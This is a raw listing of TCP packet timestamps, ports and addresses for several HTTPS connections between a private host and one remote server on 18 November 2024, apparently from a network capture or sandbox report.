                                                                                                                                          Nov 18, 2024 06:47:51.009917021 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.009948969 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.009954929 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.009972095 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.009999037 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.010023117 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.012020111 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.012041092 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.012100935 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.012108088 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.012154102 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.038979053 CET55177443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.039014101 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.039114952 CET55177443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.039377928 CET55177443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.039391041 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.039864063 CET55178443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.039875984 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.039942026 CET55178443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.040178061 CET55178443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.040188074 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.127926111 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.127958059 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.128051043 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.128084898 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.128098011 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.128125906 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.129324913 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.129359007 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.129398108 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.129403114 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.129426003 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.129445076 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.131063938 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.131087065 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.131128073 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.131134033 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.131162882 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.131175041 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.174706936 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.174743891 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.174880028 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.174907923 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.174952984 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.246462107 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.246490002 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.246620893 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.246635914 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.246676922 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.247390985 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.247412920 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.247451067 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.247456074 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.247493029 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.247502089 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.248368979 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.248397112 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.248445034 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.248451948 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.248486042 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.248505116 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.249383926 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.249408007 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.249452114 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.249458075 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.249489069 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.249506950 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.292449951 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.292474985 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.292582989 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.292593956 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.292634010 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.364273071 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.364306927 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.364342928 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.364353895 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.364401102 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.365329027 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.365350008 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.365381002 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.365386963 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.365403891 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.365428925 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.366333008 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.366353035 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.366408110 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.366414070 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.366450071 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.366944075 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.366964102 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.366997957 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.367003918 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.367039919 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.367058992 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.410142899 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.410171986 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.410264015 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.410279036 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.410315990 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.481720924 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.481746912 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.481949091 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.481960058 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.482129097 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.482700109 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.482721090 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.482795954 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.482800961 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.482835054 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.483464956 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.483485937 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.483524084 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.483527899 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.483566046 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.484270096 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.484289885 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.484323978 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.484328032 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.484347105 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.484364033 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.485783100 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.485801935 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.485840082 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.485843897 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.485867977 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.485884905 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.599580050 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.599608898 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.599750042 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.599766016 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.599841118 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.600195885 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.600215912 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.600277901 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.600284100 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.600331068 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.601269007 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.601286888 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.601351976 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.601356983 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.601402998 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.602166891 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.602230072 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.602238894 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.602243900 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.602281094 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.602286100 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.602329969 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.602592945 CET55170443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.602607965 CET44355170152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.952409029 CET44355175152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.952871084 CET55175443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.952903986 CET44355175152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.953387022 CET44355175152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.954001904 CET55175443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.954101086 CET44355175152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.954256058 CET55175443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.956743002 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.956976891 CET55174443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.956994057 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.957469940 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.957840919 CET55174443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.957922935 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.957977057 CET55174443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:51.995342016 CET44355175152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:51.999340057 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.009172916 CET55174443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.041284084 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.041723013 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.041750908 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.043206930 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.043289900 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.043683052 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.043765068 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.043849945 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.043859005 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.078455925 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.078819990 CET55178443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.078826904 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.079369068 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.079796076 CET55178443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.079863071 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.080005884 CET55178443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.089164972 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.093121052 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.093410969 CET55177443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.093440056 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.093902111 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.094269037 CET55177443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.094345093 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.094398022 CET55177443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.123348951 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.139334917 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.183780909 CET44355175152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.183842897 CET44355175152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.183927059 CET44355175152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.183936119 CET55175443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.183995962 CET55175443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.185285091 CET55175443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.185316086 CET44355175152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.188580990 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.188643932 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.188709021 CET55174443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.188728094 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.188743114 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.188806057 CET55174443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.189606905 CET55174443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.189624071 CET44355174152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.275286913 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.315762997 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.315895081 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.315969944 CET55178443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.316013098 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.316041946 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.316118002 CET55178443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.317325115 CET55178443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.317353010 CET44355178152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.321415901 CET55180443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.321463108 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.321557045 CET55180443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.321808100 CET55180443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.321820021 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.326885939 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.326957941 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.327023983 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.327044964 CET55177443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.327104092 CET55177443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.328707933 CET55177443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.328744888 CET44355177152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.331404924 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.336060047 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.336154938 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.336241961 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.336563110 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.336602926 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.392508984 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.392524004 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.392581940 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.392625093 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.392651081 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.392667055 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.392725945 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.392761946 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.392769098 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.392769098 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.392818928 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.393239021 CET55176443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.393270969 CET44355176152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.907699108 CET55182443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.907752991 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.907857895 CET55182443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.908154011 CET55182443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.908170938 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.934920073 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.935012102 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:52.935123920 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.935352087 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:52.935389042 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.349595070 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.349968910 CET55180443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.350002050 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.350476980 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.350881100 CET55180443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.350960016 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.351038933 CET55180443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.386811018 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.387109041 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.387141943 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.388288975 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.388695002 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.388837099 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.388864040 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.391356945 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.442080975 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.580713034 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.580770969 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.580828905 CET55180443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.580847025 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.580859900 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.580903053 CET55180443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.581732988 CET55180443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.581751108 CET44355180152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.617409945 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.617546082 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.617613077 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.617645979 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.617696047 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.617701054 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.617748022 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.618252993 CET55181443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.618274927 CET44355181152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.948913097 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.949209929 CET55182443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.949227095 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.949708939 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.950073957 CET55182443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.950153112 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.950275898 CET55182443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.960882902 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.961113930 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.961142063 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.961636066 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.961920977 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.962021112 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.962129116 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:53.991328955 CET44355182152.199.21.175192.168.2.16
